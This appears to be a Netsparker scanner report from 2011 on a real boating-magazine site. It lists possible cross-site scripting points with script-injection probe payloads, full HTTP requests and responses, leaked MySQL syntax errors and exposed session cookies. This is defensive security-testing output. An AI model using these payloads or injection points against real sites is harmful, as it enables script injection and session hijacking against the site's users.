http://www.soundingsonline.com/component/content/frontpage?'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D8)</script>

Request

GET /component/content/frontpage?'"--></style></script><script>netsparker(0x0025D8)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D8)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D8)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/frontpage" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/component/content/frontpage/frontpage?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/component/content/frontpage/frontpage?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <!-- JoomlaWorks "AllVideos" Plugin (v2.5.3) starts here -->
<style type="text/css" media="all">
@import "http://www.soundingsonline.com/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>

<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/silverlight.js"></script>
<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/wmvplayer.js"></script>
<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/AC_QuickTime.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5.3) ends here -->

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_uncategorized"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&a..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

32 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /modules/mod_news_show_gk3/style/style.php

/modules/mod_news_show_gk3/style/style.php

http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid='%22--%3E%3C/style%3E..

Parameters

Parameter Type Value
modid GET '"--></style></script><script>alert(0x001A89)</script>
news_content_header_pos GET 1
news_content_image_pos GET 1
img_height GET 0
img_width GET 195px
news_content_info_pos GET 1
news_content_readmore_pos GET 1
news_content_text_pos GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001A89)%3C/script%3E&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195px&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



#'"--></style></script><script>netsparker(0x001A89)</script> a.readon_class{
float: left;}

#'"--></style></script><script>netsparker(0x001A89)</script> h4.gk_news_show_news_header {
margin: 0 0 8px;
padding:0;
text-align: left;}

#'"--></style></script><script>netsparker(0x001A89)</script> img.gk_news_show_news_image {
display: block;float: left;}

#'"--></style></script><script>netsparker(0x001A89)</script> img.gk_news_show_news_image_static {
display: block;float: left;width: 195px;}

#'"--></style></script><script>netsparker(0x001A89)</script> a.gk_news_show_news_readmore {
}

#'"--></style></script><script>netsparker(0x001A89)</script> a.gk_news_show_news_readmore_inline {
margin-left: 10px;
}

#'"--></style></script><script>netsparker(0x001A89)</script> p.gk_news_show_news_text {
margin-top: 0px;
text-align: left;}

#'"--></style></script><script>netsparker(0x001A89)</script> p.gk_news_show_news_info{
text-align: left}

#'"--></style></script><script>netsparker(0x001A89)</script> table.gk_news_show_table {
}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_tablerow_top {
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel {
display: none;
padding: 6px 0 0 0;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_font {
float: left;
width: 100px;
padding: 0;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_font_path {
width: 100px;
height: 6px;
padding: 0;
border: 1px solid #EEE;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_font_knob {
width: 5px;
height: 6px;
padding: 0;
cursor: pointer;
font-size: 1px;
background: #CCC;
}

#'"--></style></script><script>netsparker(0x001A89)</script> span.gk_news_show_panel_font_value {
display:block;
float:left;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_amount {
float: right;
width: 50px;
padding: 0;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_amount_plus,
#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_amount_minus {
width: 12px;
height: 12px;
float:left;
line-height: 12px;
padding: 0;
text-align: center;
cursor: pointer;
margin-right: 3px;
border: 1px solid #EEE;
}

#'"--></style></script><script>netsparker(0x001A89)</script> span.gk_news_show_panel_amount_value {
display: block;
float:left;
font-size: 10px;
margin-left: 4px;
}

#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_tools,
#'"--></style></script><script>netsparker(0x001A89)</script> div.gk_news_show_panel_tools_hidden {
cursor: pointer;
padding: 0;
float:right;
font-size: 10px;

}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_panel-border {
border-top: 1px dotted #ccc;
}

#'"--></style></script><script>netsparker(0x001A89)</script> tr.gk_news_show_tablerow {
}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_left {
}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_center {
}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_right {
}

#'"--></style></script><script>netsparker(0x001A89)</script> td.gk_news_show_tablerow_bottom ul.gk_news_show_list_floated {
}

#'"--></style></script><script>netsparker(0x001A89)</script> ul.gk_news_show_list {
}

#'"--></style></script><script>netsparker(0x001A89)</script> tr.gk_news_show_tablerow{
}

#'"--></style></script><script>netsparker(0x001A89)</script> tr.gk_news_show_tablerow_invisible{
display: none;
}

#'"--></style></script><script>netsparker(0x001A89)</script> li.block{
display: block;
}

#'"--></style></script><script>netsparker(0x001A89)</script> li.none{
display: none;
}
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET '"--></style></script><script>alert(0x001B16)</script>
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001B16)%3C/script%3E&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #'"--></style></script><script>netsparker(0x001B16)</script>;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195 '"--></style></script><script>alert(0x001B45)</script>
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001B45)%3C%2Fscript%3E&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195 '"--></style></script><script>netsparker(0x001B45)</script>px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195 '"--></style></script><script>netsparker(0x001B45)</script>px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET '"--></style></script><script>alert(0x001B7A)</script>
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

